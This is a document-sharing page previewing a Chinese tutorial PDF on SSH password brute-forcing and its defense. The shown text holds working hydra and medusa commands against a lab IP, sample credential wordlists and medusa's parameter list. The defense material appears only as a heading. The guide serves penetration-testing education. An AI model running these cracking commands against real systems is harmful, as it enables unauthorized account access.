SSH密码暴力破解及防御实战.pdf

发布时间：2022-06-06 发布人：admin 分类：说明书资料大小：7.20M 资料格式：pdf 举报版权申诉

liuqi66-14185653-16359647669606301002.pdf-第1页.png

第1页 / 共18页

liuqi66-14185653-16359647669606301002.pdf-第2页.png

第2页 / 共18页

liuqi66-14185653-16359647669606301002.pdf-第3页.png

第3页 / 共18页

liuqi66-14185653-16359647669606301002.pdf-第4页.png

第4页 / 共18页

liuqi66-14185653-16359647669606301002.pdf-第5页.png

第5页 / 共18页

liuqi66-14185653-16359647669606301002.pdf-第6页.png

第6页 / 共18页

liuqi66-14185653-16359647669606301002.pdf-第7页.png

第7页 / 共18页

liuqi66-14185653-16359647669606301002.pdf-第8页.png

第8页 / 共18页

SSH密码暴力破解及防御实战

1. hydra [海德拉]

1.1 指定用户破解

1.2 用户列表破解

2. Medusa [美杜莎]

2.1 语法参数

2.2 破解SSH密码

3. patator

3.2 可用模块

3.3 破解SSH密码

4. BrutesPray

4.1 Kali端安装

4.2 语法参数

4.3 nmap扫描

4.4 字典爆破SSH

5. MSF

5.1 SSH模块

5.2 SSH用户枚举

5.3 SSH版本探测

5.4 SSH 暴力破解

6. 暴力破解防御

SSH密码暴力破解及防御实战 1. hydra [海德拉] 海德拉（Hydra）：希腊神话中的九头蛇，是西方的神话生物，在古希腊神话中出现最为频繁。传说它拥有九颗头，其中一颗头要是被斩断，立刻又会生出两颗头来。 hydra 是世界顶级密码暴力密码破解工具，支持几乎所有协议的在线密码破解，功能强大，其密码能否被破解关键取决于破解字典是否足够强大，在网络安全渗透过程中是一款必备的测试工具。 1.1 指定用户破解 Examples: hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -P pws.txt -M targets.txt ssh root@kali:~# hydra -l root -P pass.dic 192.168.106.134 ssh

1.2 用户列表破解 root@kali:~# cat userlist.txt admin root tianyun yangge zhuzhuxia root@kali:~# cat passlist.txt 123 abc,123 root admin owaspbwa yangge root@kali:~# hydra -L userlist.txt -P passlist.txt -t 20 192.168.106.134 ssh

root@kali:~# hydra -L userlist.txt -P passlist.txt -M hosts.txt ssh -o ssh-hydra.ok 2. Medusa [美杜莎]

美杜莎是希腊神话里的一个女妖怪，她的头发是毒蛇，长的青面獠牙，她知道自己丑，她要报复，她把见过她的人都变成了石头。据说她原是一位美丽的少女，之所以变成蛇发女妖因为梅杜莎和智慧女神雅典娜比美，雅典娜一怒之下将梅杜莎的头发变成毒蛇，变成面目丑陋的怪物。 Medusa(美杜莎)是一个速度快，支持大规模并行，模块化，爆破登录。可以同时对多个主机，用户或密码执行强力测试。Medusa 和 hydra 一样，同样属于在线密码破解工具。不同的是，medusa 的稳定性相较于 hydra 要好很多，但其支持模块要比 hydra 少一些。 2.1 语法参数 Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] -h [TEXT] 目标主机名称或者IP地址 -H [FILE] 包含目标主机名称或者IP地址文件 -u [TEXT] 测试的用户名 -U [FILE] 包含测试的用户名文件 -p [TEXT] 测试的密码 -P [FILE] 包含测试的密码文件 -C [FILE] 组合条目文件 -O [FILE] 日志信息文件 -e [n/s/ns] n代表空密码，s代表为密码与用户名相同 -M [TEXT] 模块执行名称 -m [TEXT] 传递参数到模块 -d 显示所有的模块名称 -n [NUM] 使用非默认Tcp端口 -s 启用SSL -r [NUM] 重试间隔时间，默认为3秒 -t [NUM] 设定线程数量

-T 同时测试的主机总数 -L 并行化，每个用户使用一个线程 -f 在任何主机上找到第一个账号/密码后，停止破解 -F 在任何主机上找到第一个有效的用户名/密码后停止审计 -q 显示模块的使用信息 -v [NUM] 详细级别（0-6） -w [NUM] 错误调试级别（0-10） -V 显示版本 -Z [TEXT] 继续扫描上一次 2.2 破解SSH密码 root@kali:~# medusa -M ssh -h 192.168.106.134 -u root -P passlist.txt root@kali:~# medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt

root@kali:~# medusa -M ssh -h 192.168.106.134 -U userlist.txt -P passlist.txt -F root@kali:~# medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt -O ssh.log

3. patator

Patator，强大的命令行暴力破解器 3.2 可用模块 3.3 破解SSH密码

分享到：

赞收藏

资料库

SSH密码暴力破解及防御实战.pdf

相关推荐

安全技术

热门标签

最新资料